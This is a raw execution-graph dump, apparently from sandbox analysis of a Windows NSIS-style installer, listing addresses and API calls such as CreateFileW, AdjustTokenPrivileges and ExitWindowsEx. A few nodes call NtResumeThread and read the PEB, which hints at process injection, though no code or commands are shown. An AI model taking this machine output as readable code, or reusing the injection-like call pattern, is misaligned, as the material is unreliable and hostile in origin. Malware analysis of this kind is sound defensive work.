                                                                                    execution_graph 10050 403640 SetErrorMode GetVersionExW 10051 403692 GetVersionExW 10050->10051 10052 4036ca 10050->10052 10051->10052 10053 403723 10052->10053 10054 406a35 5 API calls 10052->10054 10141 4069c5 GetSystemDirectoryW 10053->10141 10054->10053 10056 403739 lstrlenA 10056->10053 10057 403749 10056->10057 10144 406a35 GetModuleHandleA 10057->10144 10060 406a35 5 API calls 10061 403757 10060->10061 10062 406a35 5 API calls 10061->10062 10063 403763 #17 OleInitialize SHGetFileInfoW 10062->10063 10150 406668 lstrcpynW 10063->10150 10066 4037b0 GetCommandLineW 10151 406668 lstrcpynW 10066->10151 10068 4037c2 10152 405f64 10068->10152 10071 4038f7 10072 40390b GetTempPathW 10071->10072 10156 40360f 10072->10156 10074 403923 10076 403927 GetWindowsDirectoryW lstrcatW 10074->10076 10077 40397d DeleteFileW 10074->10077 10075 405f64 CharNextW 10079 4037f9 10075->10079 10080 40360f 12 API calls 10076->10080 10166 4030d0 GetTickCount GetModuleFileNameW 10077->10166 10079->10071 10079->10075 10084 4038f9 10079->10084 10081 403943 10080->10081 10081->10077 10083 403947 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 10081->10083 10082 403990 10089 405f64 CharNextW 10082->10089 10113 403a54 10082->10113 10126 403a45 10082->10126 10085 40360f 12 API calls 10083->10085 10252 406668 lstrcpynW 10084->10252 10088 403975 10085->10088 10088->10077 10088->10113 10103 4039b2 10089->10103 10092 403b91 10095 403b99 GetCurrentProcess OpenProcessToken 10092->10095 10096 403c0f ExitProcess 10092->10096 10093 403b7c 10315 405cc8 10093->10315 10101 403bb0 LookupPrivilegeValueW AdjustTokenPrivileges 10095->10101 10102 403bdf 10095->10102 10098 403a1b 10253 40603f 10098->10253 10099 403a5c 10269 405c33 10099->10269 10101->10102 10105 406a35 5 API calls 10102->10105 10103->10098 10103->10099 10108 403be6 10105->10108 10110 403bfb ExitWindowsEx 10108->10110 10116 403c08 10108->10116 10110->10096 10110->10116 10111 403a72 lstrcatW 10112 403a7d lstrcatW lstrcmpiW 10111->10112 10112->10113 10114 403a9d 10112->10114 10306 403c25 10113->10306 10117 403aa2 10114->10117 10118 403aa9 10114->10118 10319 40140b 10116->10319 10272 405b99 CreateDirectoryW 10117->10272 10277 405c16 CreateDirectoryW 10118->10277 10119 403a3a 10268 406668 lstrcpynW 10119->10268 10125 403aae SetCurrentDirectoryW 10127 403ac0 10125->10127 10128 403acb 10125->10128 10196 403d17 10126->10196 10280 406668 lstrcpynW 10127->10280 10281 406668 lstrcpynW 10128->10281 10133 403b19 CopyFileW 10138 403ad8 10133->10138 10134 403b63 10136 406428 36 API calls 10134->10136 10136->10113 10137 4066a5 17 API calls 10137->10138 10138->10134 10138->10137 10140 403b4d CloseHandle 10138->10140 10282 4066a5 10138->10282 10299 406428 MoveFileExW 10138->10299 10303 405c4b CreateProcessW 10138->10303 10140->10138 10142 4069e7 wsprintfW LoadLibraryExW 10141->10142 10142->10056 10145 406a51 10144->10145 10146 406a5b GetProcAddress 10144->10146 10147 4069c5 3 API calls 10145->10147 10148 403750 10146->10148 10149 406a57 10147->10149 10148->10060 10149->10146 10149->10148 10150->10066 10151->10068 10153 405f6a 10152->10153 10154 4037e8 CharNextW 10153->10154 10155 405f71 CharNextW 10153->10155 10154->10079 10155->10153 10322 4068ef 10156->10322 10158 40361b 10159 403625 10158->10159 10331 405f37 lstrlenW CharPrevW 10158->10331 10159->10074 10162 405c16 2 API calls 10163 403633 10162->10163 10334 406187 10163->10334 10338 406158 GetFileAttributesW CreateFileW 10166->10338 10168 403113 10195 403120 10168->10195 10339 406668 lstrcpynW 10168->10339 10170 403136 10340 405f83 lstrlenW 10170->10340 10174 403147 GetFileSize 10175 403241 10174->10175 10194 40315e 10174->10194 10345 40302e 10175->10345 10179 403286 GlobalAlloc 10182 40329d 10179->10182 10181 4032de 10183 40302e 32 API calls 10181->10183 10186 406187 2 API calls 10182->10186 10183->10195 10184 403267 10185 4035e2 ReadFile 10184->10185 10187 403272 10185->10187 10189 4032ae CreateFileW 10186->10189 10187->10179 10187->10195 10188 40302e 32 API calls 10188->10194 10190 4032e8 10189->10190 10189->10195 10360 4035f8 SetFilePointer 10190->10360 10192 4032f6 10361 403371 10192->10361 10194->10175 10194->10181 10194->10188 10194->10195 10376 4035e2 10194->10376 10195->10082 10197 406a35 5 API calls 10196->10197 10198 403d2b 10197->10198 10199 403d31 10198->10199 10200 403d43 10198->10200 10438 4065af wsprintfW 10199->10438 10439 406536 10200->10439 10204 403d92 lstrcatW 10205 403d41 10204->10205 10423 403fed 10205->10423 10206 406536 3 API calls 10206->10204 10209 40603f 18 API calls 10211 403dc4 10209->10211 10210 403e58 10212 40603f 18 API calls 10210->10212 10211->10210 10213 406536 3 API calls 10211->10213 10214 403e5e 10212->10214 10215 403df6 10213->10215 10216 403e6e LoadImageW 10214->10216 10217 4066a5 17 API calls 10214->10217 10215->10210 10220 403e17 lstrlenW 10215->10220 10223 405f64 CharNextW 10215->10223 10218 403f14 10216->10218 10219 403e95 RegisterClassW 10216->10219 10217->10216 10222 40140b 2 API calls 10218->10222 10221 403ecb SystemParametersInfoW CreateWindowExW 10219->10221 10251 403f1e 10219->10251 10224 403e25 lstrcmpiW 10220->10224 10225 403e4b 10220->10225 10221->10218 10226 403f1a 10222->10226 10228 403e14 10223->10228 10224->10225 10229 403e35 GetFileAttributesW 10224->10229 10227 405f37 3 API calls 10225->10227 10230 403fed 18 API calls 10226->10230 10226->10251 10231 403e51 10227->10231 10228->10220 10232 403e41 10229->10232 10233 403f2b 10230->10233 10444 406668 lstrcpynW 10231->10444 10232->10225 10235 405f83 2 API calls 10232->10235 10236 403f37 ShowWindow 10233->10236 10237 403fba 10233->10237 10235->10225 10239 4069c5 3 API calls 10236->10239 10431 40579d OleInitialize 10237->10431 10241 403f4f 10239->10241 10240 403fc0 10242 403fc4 10240->10242 10243 403fdc 10240->10243 10244 403f5d GetClassInfoW 10241->10244 10246 4069c5 3 API calls 10241->10246 10249 40140b 2 API calls 10242->10249 10242->10251 10245 40140b 2 API calls 10243->10245 10247 403f71 GetClassInfoW RegisterClassW 10244->10247 10248 403f87 DialogBoxParamW 10244->10248 10245->10251 10246->10244 10247->10248 10250 40140b 2 API calls 10248->10250 10249->10251 10250->10251 10251->10113 10252->10072 10460 406668 lstrcpynW 10253->10460 10255 406050 10461 405fe2 CharNextW CharNextW 10255->10461 10258 403a27 10258->10113 10267 406668 lstrcpynW 10258->10267 10259 4068ef 5 API calls 10265 406066 10259->10265 10260 406097 lstrlenW 10261 4060a2 10260->10261 10260->10265 10263 405f37 3 API calls 10261->10263 10264 4060a7 GetFileAttributesW 10263->10264 10264->10258 10265->10258 10265->10260 10266 405f83 2 API calls 10265->10266 10467 40699e FindFirstFileW 10265->10467 10266->10260 10267->10119 10268->10126 10270 406a35 5 API calls 10269->10270 10271 403a61 lstrcatW 10270->10271 10271->10111 10271->10112 10273 403aa7 10272->10273 10274 405bea GetLastError 10272->10274 10273->10125 10274->10273 10275 405bf9 SetFileSecurityW 10274->10275 10275->10273 10276 405c0f GetLastError 10275->10276 10276->10273 10278 405c26 10277->10278 10279 405c2a GetLastError 10277->10279 10278->10125 10279->10278 10280->10128 10281->10138 10286 4066b2 10282->10286 10283 4068d5 10284 403b0d DeleteFileW 10283->10284 10472 406668 lstrcpynW 10283->10472 10284->10133 10284->10138 10286->10283 10287 4068a3 lstrlenW 10286->10287 10288 4067ba GetSystemDirectoryW 10286->10288 10291 406536 3 API calls 10286->10291 10292 4066a5 10 API calls 10286->10292 10293 4067cd GetWindowsDirectoryW 10286->10293 10294 4068ef 5 API calls 10286->10294 10295 4067fc SHGetSpecialFolderLocation 10286->10295 10296 406844 lstrcatW 10286->10296 10297 4066a5 10 API calls 10286->10297 10470 4065af wsprintfW 10286->10470 10471 406668 lstrcpynW 10286->10471 10287->10286 10288->10286 10291->10286 10292->10287 10293->10286 10294->10286 10295->10286 10298 406814 SHGetPathFromIDListW CoTaskMemFree 10295->10298 10296->10286 10297->10286 10298->10286 10300 406449 10299->10300 10301 40643c 10299->10301 10300->10138 10473 4062ae 10301->10473 10304 405c8a 10303->10304 10305 405c7e CloseHandle 10303->10305 10304->10138 10305->10304 10307 403c40 10306->10307 10308 403c36 CloseHandle 10306->10308 10309 403c54 10307->10309 10310 403c4a CloseHandle 10307->10310 10308->10307 10507 403c82 10309->10507 10310->10309 10318 405cdd 10315->10318 10316 403b89 ExitProcess 10317 405cf1 MessageBoxIndirectW 10317->10316 10318->10316 10318->10317 10320 401389 2 API calls 10319->10320 10321 401420 10320->10321 10321->10096 10324 4068fc 10322->10324 10323 406972 10325 406977 CharPrevW 10323->10325 10328 406998 10323->10328 10324->10323 10326 406965 CharNextW 10324->10326 10327 405f64 CharNextW 10324->10327 10329 406951 CharNextW 10324->10329 10330 406960 CharNextW 10324->10330 10325->10323 10326->10323 10326->10324 10327->10324 10328->10158 10329->10324 10330->10326 10332 405f53 lstrcatW 10331->10332 10333 40362d 10331->10333 10332->10333 10333->10162 10335 406194 GetTickCount GetTempFileNameW 10334->10335 10336 40363e 10335->10336 10337 4061ca 10335->10337 10336->10074 10337->10335 10337->10336 10338->10168 10339->10170 10341 405f91 10340->10341 10342 40313c 10341->10342 10343 405f97 CharPrevW 10341->10343 10344 406668 lstrcpynW 10342->10344 10343->10341 10343->10342 10344->10174 10346 403057 10345->10346 10347 40303f 10345->10347 10350 403067 GetTickCount 10346->10350 10351 40305f 10346->10351 10348 403048 DestroyWindow 10347->10348 10349 40304f 10347->10349 10348->10349 10349->10179 10349->10195 10379 4035f8 SetFilePointer 10349->10379 10350->10349 10353 403075 10350->10353 10380 406a71 10351->10380 10354 4030aa CreateDialogParamW ShowWindow 10353->10354 10355 40307d 10353->10355 10354->10349 10355->10349 10384 403012 10355->10384 10357 40308b wsprintfW 10387 4056ca 10357->10387 10360->10192 10362 403380 SetFilePointer 10361->10362 10363 40339c 10361->10363 10362->10363 10398 403479 GetTickCount 10363->10398 10366 403439 10366->10195 10369 403479 42 API calls 10370 4033d3 10369->10370 10370->10366 10371 40343f ReadFile 10370->10371 10373 4033e2 10370->10373 10371->10366 10373->10366 10374 4061db ReadFile 10373->10374 10413 40620a WriteFile 10373->10413 10374->10373 10377 4061db ReadFile 10376->10377 10378 4035f5 10377->10378 10378->10194 10379->10184 10381 406a8e PeekMessageW 10380->10381 10382 406a84 DispatchMessageW 10381->10382 10383 406a9e 10381->10383 10382->10381 10383->10349 10385 403021 10384->10385 10386 403023 MulDiv 10384->10386 10385->10386 10386->10357 10388 4056e5 10387->10388 10397 4030a8 10387->10397 10389 405701 lstrlenW 10388->10389 10390 4066a5 17 API calls 10388->10390 10391 40572a 10389->10391 10392 40570f lstrlenW 10389->10392 10390->10389 10393 405730 SetWindowTextW 10391->10393 10394 40573d 10391->10394 10395 405721 lstrcatW 10392->10395 10392->10397 10393->10394 10396 405743 SendMessageW SendMessageW SendMessageW 10394->10396 10394->10397 10395->10391 10396->10397 10397->10349 10399 4035d1 10398->10399 10400 4034a7 10398->10400 10401 40302e 32 API calls 10399->10401 10415 4035f8 SetFilePointer 10400->10415 10408 4033a3 10401->10408 10403 4034b2 SetFilePointer 10406 4034d7 10403->10406 10404 4035e2 ReadFile 10404->10406 10406->10404 10407 40302e 32 API calls 10406->10407 10406->10408 10409 40620a WriteFile 10406->10409 10410 4035b2 SetFilePointer 10406->10410 10416 406bb0 10406->10416 10407->10406 10408->10366 10411 4061db ReadFile 10408->10411 10409->10406 10410->10399 10412 4033bc 10411->10412 10412->10366 10412->10369 10414 406228 10413->10414 10414->10373 10415->10403 10417 406bd5 10416->10417 10418 406bdd 10416->10418 10417->10406 10418->10417 10419 406c64 GlobalFree 10418->10419 10420 406c6d GlobalAlloc 10418->10420 10421 406ce4 GlobalAlloc 10418->10421 10422 406cdb GlobalFree 10418->10422 10419->10420 10420->10417 10420->10418 10421->10417 10421->10418 10422->10421 10424 404001 10423->10424 10445 4065af wsprintfW 10424->10445 10426 404072 10446 4040a6 10426->10446 10428 403da2 10428->10209 10429 404077 10429->10428 10430 4066a5 17 API calls 10429->10430 10430->10429 10449 404610 10431->10449 10433 4057e7 10434 404610 SendMessageW 10433->10434 10436 4057f9 OleUninitialize 10434->10436 10435 4057c0 10435->10433 10452 401389 10435->10452 10436->10240 10438->10205 10456 4064d5 10439->10456 10442 403d73 10442->10204 10442->10206 10443 40656a RegQueryValueExW RegCloseKey 10443->10442 10444->10210 10445->10426 10447 4066a5 17 API calls 10446->10447 10448 4040b4 SetWindowTextW 10447->10448 10448->10429 10450 404628 10449->10450 10451 404619 SendMessageW 10449->10451 10450->10435 10451->10450 10453 401390 10452->10453 10454 4013fe 10453->10454 10455 4013cb MulDiv SendMessageW 10453->10455 10454->10435 10455->10453 10457 4064e4 10456->10457 10458 4064e8 10457->10458 10459 4064ed RegOpenKeyExW 10457->10459 10458->10442 10458->10443 10459->10458 10460->10255 10462 405fff 10461->10462 10464 406011 10461->10464 10463 40600c CharNextW 10462->10463 10462->10464 10466 406035 10463->10466 10465 405f64 CharNextW 10464->10465 10464->10466 10465->10464 10466->10258 10466->10259 10468 4069b4 FindClose 10467->10468 10469 4069bf 10467->10469 10468->10469 10469->10265 10470->10286 10471->10286 10472->10284 10474 406304 GetShortPathNameW 10473->10474 10475 4062de 10473->10475 10476 406423 10474->10476 10477 406319 10474->10477 10500 406158 GetFileAttributesW CreateFileW 10475->10500 10476->10300 10477->10476 10480 406321 wsprintfA 10477->10480 10479 4062e8 CloseHandle GetShortPathNameW 10479->10476 10481 4062fc 10479->10481 10482 4066a5 17 API calls 10480->10482 10481->10474 10481->10476 10483 406349 10482->10483 10501 406158 GetFileAttributesW CreateFileW 10483->10501 10485 406356 10485->10476 10486 406365 GetFileSize GlobalAlloc 10485->10486 10487 406387 10486->10487 10488 40641c CloseHandle 10486->10488 10489 4061db ReadFile 10487->10489 10488->10476 10490 40638f 10489->10490 10490->10488 10502 4060bd lstrlenA 10490->10502 10493 4063a6 lstrcpyA 10496 4063c8 10493->10496 10494 4063ba 10495 4060bd 4 API calls 10494->10495 10495->10496 10497 4063ff SetFilePointer 10496->10497 10498 40620a WriteFile 10497->10498 10499 406415 GlobalFree 10498->10499 10499->10488 10500->10479 10501->10485 10503 4060fe lstrlenA 10502->10503 10504 406106 10503->10504 10505 4060d7 lstrcmpiA 10503->10505 10504->10493 10504->10494 10505->10504 10506 4060f5 CharNextA 10505->10506 10506->10503 10508 403c90 10507->10508 10509 403c59 10508->10509 10510 403c95 FreeLibrary GlobalFree 10508->10510 10511 405d74 10509->10511 10510->10509 10510->10510 10512 40603f 18 API calls 10511->10512 10513 405d94 10512->10513 10514 405db3 10513->10514 10515 405d9c DeleteFileW 10513->10515 10517 405ed3 10514->10517 10550 406668 lstrcpynW 10514->10550 10516 403b71 OleUninitialize 10515->10516 10516->10092 10516->10093 10517->10516 10522 40699e 2 API calls 10517->10522 10519 405dd9 10520 405dec 10519->10520 10521 405ddf lstrcatW 10519->10521 10524 405f83 2 API calls 10520->10524 10523 405df2 10521->10523 10526 405ef8 10522->10526 10525 405e02 lstrcatW 10523->10525 10527 405e0d lstrlenW FindFirstFileW 10523->10527 10524->10523 10525->10527 10526->10516 10528 405efc 10526->10528 10527->10517 10535 405e2f 10527->10535 10529 405f37 3 API calls 10528->10529 10530 405f02 10529->10530 10532 405d2c 5 API calls 10530->10532 10531 405eb6 FindNextFileW 10531->10535 10536 405ecc FindClose 10531->10536 10534 405f0e 10532->10534 10537 405f28 10534->10537 10539 405f12 10534->10539 10535->10531 10548 405e77 10535->10548 10551 406668 lstrcpynW 10535->10551 10536->10517 10538 4056ca 24 API calls 10537->10538 10538->10516 10539->10516 10541 4056ca 24 API calls 10539->10541 10543 405f1f 10541->10543 10542 405d74 60 API calls 10542->10548 10545 406428 36 API calls 10543->10545 10544 4056ca 24 API calls 10544->10531 10547 405f26 10545->10547 10546 4056ca 24 API calls 10546->10548 10547->10516 10548->10531 10548->10542 10548->10544 10548->10546 10549 406428 36 API calls 10548->10549 10552 405d2c 10548->10552 10549->10548 10550->10519 10551->10535 10560 406133 GetFileAttributesW 10552->10560 10554 405d59 10554->10548 10556 405d47 RemoveDirectoryW 10558 405d55 10556->10558 10557 405d4f DeleteFileW 10557->10558 10558->10554 10559 405d65 SetFileAttributesW 10558->10559 10559->10554 10561 405d38 10560->10561 10562 406145 SetFileAttributesW 10560->10562 10561->10554 10561->10556 10561->10557 10562->10561 10563 401941 10564 401943 10563->10564 10569 402da6 10564->10569 10567 405d74 67 API calls 10568 401951 10567->10568 10570 402db2 10569->10570 10571 4066a5 17 API calls 10570->10571 10572 402dd3 10571->10572 10573 401948 10572->10573 10574 4068ef 5 API calls 10572->10574 10573->10567 10574->10573 11275 70e210e1 11281 70e21111 11275->11281 11276 70e212b0 GlobalFree 11277 70e211d7 GlobalAlloc 11277->11281 11278 70e21240 GlobalFree 11278->11281 11279 70e212ab 11279->11276 11280 70e2135a 2 API calls 11280->11281 11281->11276 11281->11277 11281->11278 11281->11279 11281->11280 11282 70e21312 2 API calls 11281->11282 11283 70e2129a GlobalFree 11281->11283 11284 70e2116b GlobalAlloc 11281->11284 11285 70e21381 lstrcpyW 11281->11285 11282->11281 11283->11281 11284->11281 11285->11281 11286 401c43 11287 402d84 17 API calls 11286->11287 11288 401c4a 11287->11288 11289 402d84 17 API calls 11288->11289 11290 401c57 11289->11290 11291 402da6 17 API calls 11290->11291 11295 401c6c 11290->11295 11291->11295 11292 402da6 17 API calls 11296 401c7c 11292->11296 11293 401cd3 11298 402da6 17 API calls 11293->11298 11294 401c87 11297 402d84 17 API calls 11294->11297 11295->11292 11295->11296 11296->11293 11296->11294 11299 401c8c 11297->11299 11300 401cd8 11298->11300 11301 402d84 17 API calls 11299->11301 11302 402da6 17 API calls 11300->11302 11304 401c98 11301->11304 11303 401ce1 FindWindowExW 11302->11303 11307 401d03 11303->11307 11305 401cc3 SendMessageW 11304->11305 11306 401ca5 SendMessageTimeoutW 11304->11306 11305->11307 11306->11307 11869 70e223e9 11870 70e22453 11869->11870 11871 70e2245e GlobalAlloc 11870->11871 11872 70e2247d 11870->11872 11871->11870 11308 401e4e GetDC 11309 402d84 17 API calls 11308->11309 11310 401e60 GetDeviceCaps MulDiv ReleaseDC 11309->11310 11311 402d84 17 API calls 11310->11311 11312 401e91 11311->11312 11313 4066a5 17 API calls 11312->11313 11314 401ece CreateFontIndirectW 11313->11314 11315 402638 11314->11315 11873 402950 11874 402da6 17 API calls 11873->11874 11875 40295c 11874->11875 11876 402972 11875->11876 11877 402da6 17 API calls 11875->11877 11878 406133 2 API calls 11876->11878 11877->11876 11879 402978 11878->11879 11901 406158 GetFileAttributesW CreateFileW 11879->11901 11881 402985 11882 402a3b 11881->11882 11885 4029a0 GlobalAlloc 11881->11885 11886 402a23 11881->11886 11883 402a42 DeleteFileW 11882->11883 11884 402a55 11882->11884 11883->11884 11885->11886 11887 4029b9 11885->11887 11888 403371 44 API calls 11886->11888 11902 4035f8 SetFilePointer 11887->11902 11889 402a30 CloseHandle 11888->11889 11889->11882 11891 4029bf 11892 4035e2 ReadFile 11891->11892 11893 4029c8 GlobalAlloc 11892->11893 11894 4029d8 11893->11894 11895 402a0c 11893->11895 11896 403371 44 API calls 11894->11896 11897 40620a WriteFile 11895->11897 11900 4029e5 11896->11900 11898 402a18 GlobalFree 11897->11898 11898->11886 11899 402a03 GlobalFree 11899->11895 11900->11899 11901->11881 11902->11891 11903 401956 11904 402da6 17 API calls 11903->11904 11905 40195d lstrlenW 11904->11905 11906 402638 11905->11906 11907 402b59 11908 402b60 11907->11908 11909 402bab 11907->11909 11911 402ba9 11908->11911 11913 402d84 17 API calls 11908->11913 11910 406a35 5 API calls 11909->11910 11912 402bb2 11910->11912 11914 402da6 17 API calls 11912->11914 11915 402b6e 11913->11915 11916 402bbb 11914->11916 11917 402d84 17 API calls 11915->11917 11916->11911 11918 402bbf IIDFromString 11916->11918 11920 402b7a 11917->11920 11918->11911 11919 402bce 11918->11919 11919->11911 11925 406668 lstrcpynW 11919->11925 11924 4065af wsprintfW 11920->11924 11923 402beb CoTaskMemFree 11923->11911 11924->11911 11925->11923 11323 402a5b 11324 402d84 17 API calls 11323->11324 11325 402a61 11324->11325 11326 402aa4 11325->11326 11327 402a88 11325->11327 11330 40292e 11325->11330 11328 402abe 11326->11328 11329 402aae 11326->11329 11331 402a8d 11327->11331 11336 402a9e 11327->11336 11333 4066a5 17 API calls 11328->11333 11332 402d84 17 API calls 11329->11332 11337 406668 lstrcpynW 11331->11337 11332->11336 11333->11336 11336->11330 11338 4065af wsprintfW 11336->11338 11337->11330 11338->11330 11075 40175c 11076 402da6 17 API calls 11075->11076 11077 401763 11076->11077 11078 406187 2 API calls 11077->11078 11079 40176a 11078->11079 11080 406187 2 API calls 11079->11080 11080->11079 11926 401d5d 11927 402d84 17 API calls 11926->11927 11928 401d6e SetWindowLongW 11927->11928 11929 402c2a 11928->11929 11107 3393526 11108 33932d7 11107->11108 11109 339db0f 2 API calls 11108->11109 11110 33933c5 11108->11110 11109->11108 11339 3395526 11340 339559d 11339->11340 11341 339569a 11340->11341 11349 33a00da 11340->11349 11343 33a00da NtResumeThread 11341->11343 11344 33956cd 11343->11344 11345 33a00da NtResumeThread 11344->11345 11346 33957a2 11345->11346 11347 33a00da NtResumeThread 11346->11347 11348 33957bb 11347->11348 11350 33a00df NtResumeThread 11349->11350 11930 406d5f 11932 406be3 11930->11932 11931 40754e 11932->11931 11932->11932 11933 406c64 GlobalFree 11932->11933 11934 406c6d GlobalAlloc 11932->11934 11935 406ce4 GlobalAlloc 11932->11935 11936 406cdb GlobalFree 11932->11936 11933->11934 11934->11931 11934->11932 11935->11931 11935->11932 11936->11935 11937 401563 11938 402ba4 11937->11938 11941 4065af wsprintfW 11938->11941 11940 402ba9 11941->11940 11942 401968 11943 402d84 17 API calls 11942->11943 11944 40196f 11943->11944 11945 402d84 17 API calls 11944->11945 11946 40197c 11945->11946 11947 402da6 17 API calls 11946->11947 11948 401993 lstrlenW 11947->11948 11950 4019a4 11948->11950 11949 4019e5 11950->11949 11954 406668 lstrcpynW 11950->11954 11952 4019d5 11952->11949 11953 4019da lstrlenW 11952->11953 11953->11949 11954->11952 11358 40166a 11359 402da6 17 API calls 11358->11359 11360 401670 11359->11360 11361 40699e 2 API calls 11360->11361 11362 401676 11361->11362 11955 3396812 11956 339681e 11955->11956 11957 3396ab3 11955->11957 11956->11957 11959 33a00da NtResumeThread 11956->11959 11960 3396952 11956->11960 11958 3396a9a 11959->11960 11960->11958 11961 33a00da NtResumeThread 11960->11961 11961->11958 11363 404a6e 11364 404aa4 11363->11364 11365 404a7e 11363->11365 11367 40462b 8 API calls 11364->11367 11366 4045c4 18 API calls 11365->11366 11368 404a8b SetDlgItemTextW 11366->11368 11369 404ab0 11367->11369 11368->11364 11133 40176f 11134 402da6 17 API calls 11133->11134 11135 401776 11134->11135 11136 401796 11135->11136 11137 40179e 11135->11137 11172 406668 lstrcpynW 11136->11172 11173 406668 lstrcpynW 11137->11173 11140 40179c 11144 4068ef 5 API calls 11140->11144 11141 4017a9 11142 405f37 3 API calls 11141->11142 11143 4017af lstrcatW 11142->11143 11143->11140 11160 4017bb 11144->11160 11145 40699e 2 API calls 11145->11160 11146 406133 2 API calls 11146->11160 11148 4017cd CompareFileTime 11148->11160 11149 40188d 11150 4056ca 24 API calls 11149->11150 11152 401897 11150->11152 11151 401864 11153 4056ca 24 API calls 11151->11153 11169 401879 11151->11169 11155 403371 44 API calls 11152->11155 11153->11169 11154 406668 lstrcpynW 11154->11160 11156 4018aa 11155->11156 11157 4018be SetFileTime 11156->11157 11159 4018d0 CloseHandle 11156->11159 11157->11159 11158 4066a5 17 API calls 11158->11160 11161 4018e1 11159->11161 11159->11169 11160->11145 11160->11146 11160->11148 11160->11149 11160->11151 11160->11154 11160->11158 11166 405cc8 MessageBoxIndirectW 11160->11166 11171 406158 GetFileAttributesW CreateFileW 11160->11171 11162 4018e6 11161->11162 11163 4018f9 11161->11163 11164 4066a5 17 API calls 11162->11164 11165 4066a5 17 API calls 11163->11165 11167 4018ee lstrcatW 11164->11167 11168 401901 11165->11168 11166->11160 11167->11168 11168->11169 11170 405cc8 MessageBoxIndirectW 11168->11170 11170->11169 11171->11160 11172->11140 11173->11141 11962 3398a08 11963 3398a3c GetPEB 11962->11963 11965 3398e66 11963->11965 11374 401a72 11375 402d84 17 API calls 11374->11375 11376 401a7b 11375->11376 11377 402d84 17 API calls 11376->11377 11378 401a20 11377->11378 11966 401573 11967 401583 ShowWindow 11966->11967 11968 40158c 11966->11968 11967->11968 11969 40159a ShowWindow 11968->11969 11970 402c2a 11968->11970 11969->11970 11379 3395f0e 11380 3393100 11379->11380 11381 3396043 11380->11381 11382 3392fc9 3 API calls 11380->11382 11383 3393105 11382->11383 11384 339db0f 2 API calls 11383->11384 11385 33931aa 11384->11385 11971 401b77 11972 402da6 17 API calls 11971->11972 11973 401b7e 11972->11973 11974 402d84 17 API calls 11973->11974 11975 401b87 wsprintfW 11974->11975 11976 402c2a 11975->11976 11386 40167b 11387 402da6 17 API calls 11386->11387 11388 401682 11387->11388 11389 402da6 17 API calls 11388->11389 11390 40168b 11389->11390 11391 402da6 17 API calls 11390->11391 11392 401694 MoveFileW 11391->11392 11393 4016a0 11392->11393 11394 4016a7 11392->11394 11396 401423 24 API calls 11393->11396 11395 40699e 2 API calls 11394->11395 11398 4022f6 11394->11398 11397 4016b6 11395->11397 11396->11398 11397->11398 11399 406428 36 API calls 11397->11399 11399->11393 11400 401000 11401 401037 BeginPaint GetClientRect 11400->11401 11403 40100c DefWindowProcW 11400->11403 11404 4010f3 11401->11404 11407 401179 11403->11407 11405 401073 CreateBrushIndirect FillRect DeleteObject 11404->11405 11406 4010fc 11404->11406 11405->11404 11408 401102 CreateFontIndirectW 11406->11408 11409 401167 EndPaint 11406->11409 11408->11409 11410 401112 6 API calls 11408->11410 11409->11407 11410->11409 11977 3398c7b 11978 3398cd0 11977->11978 11979 3398dcd GetPEB 11978->11979 11980 3398e66 11978->11980 11979->11980 11981 401503 11982 40150b 11981->11982 11984 40151e 11981->11984 11983 402d84 17 API calls 11982->11983 11983->11984 11411 402c05 SendMessageW 11412 402c2a 11411->11412 11413 402c1f InvalidateRect 11411->11413 11413->11412 10694 405809 10695 4059b3 10694->10695 10696 40582a GetDlgItem GetDlgItem GetDlgItem 10694->10696 10697 4059e4 10695->10697 10698 4059bc GetDlgItem CreateThread CloseHandle 10695->10698 10740 4045f9 SendMessageW 10696->10740 10700 405a0f 10697->10700 10702 405a34 10697->10702 10703 4059fb ShowWindow ShowWindow 10697->10703 10698->10697 10743 40579d 5 API calls 10698->10743 10704 405a1b 10700->10704 10705 405a6f 10700->10705 10701 40589a 10706 4058a1 GetClientRect GetSystemMetrics SendMessageW SendMessageW 10701->10706 10710 40462b 8 API calls 10702->10710 10742 4045f9 SendMessageW 10703->10742 10708 405a23 10704->10708 10709 405a49 ShowWindow 10704->10709 10705->10702 10713 405a7d SendMessageW 10705->10713 10711 4058f3 SendMessageW SendMessageW 10706->10711 10712 40590f 10706->10712 10714 40459d SendMessageW 10708->10714 10716 405a69 10709->10716 10717 405a5b 10709->10717 10715 405a42 10710->10715 10711->10712 10719 405922 10712->10719 10720 405914 SendMessageW 10712->10720 10713->10715 10721 405a96 CreatePopupMenu 10713->10721 10714->10702 10718 40459d SendMessageW 10716->10718 10722 4056ca 24 API calls 10717->10722 10718->10705 10724 4045c4 18 API calls 10719->10724 10720->10719 10723 4066a5 17 API calls 10721->10723 10722->10716 10725 405aa6 AppendMenuW 10723->10725 10726 405932 10724->10726 10727 405ac3 GetWindowRect 10725->10727 10728 405ad6 TrackPopupMenu 10725->10728 10729 40593b ShowWindow 10726->10729 10730 40596f GetDlgItem SendMessageW 10726->10730 10727->10728 10728->10715 10731 405af1 10728->10731 10732 405951 ShowWindow 10729->10732 10733 40595e 10729->10733 10730->10715 10734 405996 SendMessageW SendMessageW 10730->10734 10735 405b0d SendMessageW 10731->10735 10732->10733 10741 4045f9 SendMessageW 10733->10741 10734->10715 10735->10735 10736 405b2a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 10735->10736 10738 405b4f SendMessageW 10736->10738 10738->10738 10739 405b78 GlobalUnlock SetClipboardData CloseClipboard 10738->10739 10739->10715 10740->10701 10741->10730 10742->10700 10775 40290b 10776 402da6 17 API calls 10775->10776 10777 402912 FindFirstFileW 10776->10777 10778 40293a 10777->10778 10782 402925 10777->10782 10780 402943 10778->10780 10783 4065af wsprintfW 10778->10783 10784 406668 lstrcpynW 10780->10784 10783->10780 10784->10782 11414 404e0b 11415 404e37 11414->11415 11416 404e1b 11414->11416 11417 404e6a 11415->11417 11418 404e3d SHGetPathFromIDListW 11415->11418 11425 405cac GetDlgItemTextW 11416->11425 11420 404e4d 11418->11420 11424 404e54 SendMessageW 11418->11424 11422 40140b 2 API calls 11420->11422 11421 404e28 SendMessageW 11421->11415 11422->11424 11424->11417 11425->11421 11985 40190c 11986 401943 11985->11986 11987 402da6 17 API calls 11986->11987 11988 401948 11987->11988 11989 405d74 67 API calls 11988->11989 11990 401951 11989->11990 11991 40190f 11992 402da6 17 API calls 11991->11992 11993 401916 11992->11993 11994 405cc8 MessageBoxIndirectW 11993->11994 11995 40191f 11994->11995 11996 401f12 11997 402da6 17 API calls 11996->11997 11998 401f18 11997->11998 11999 402da6 17 API calls 11998->11999 12000 401f21 11999->12000 12001 402da6 17 API calls 12000->12001 12002 401f2a 12001->12002 12003 402da6 17 API calls 12002->12003 12004 401f33 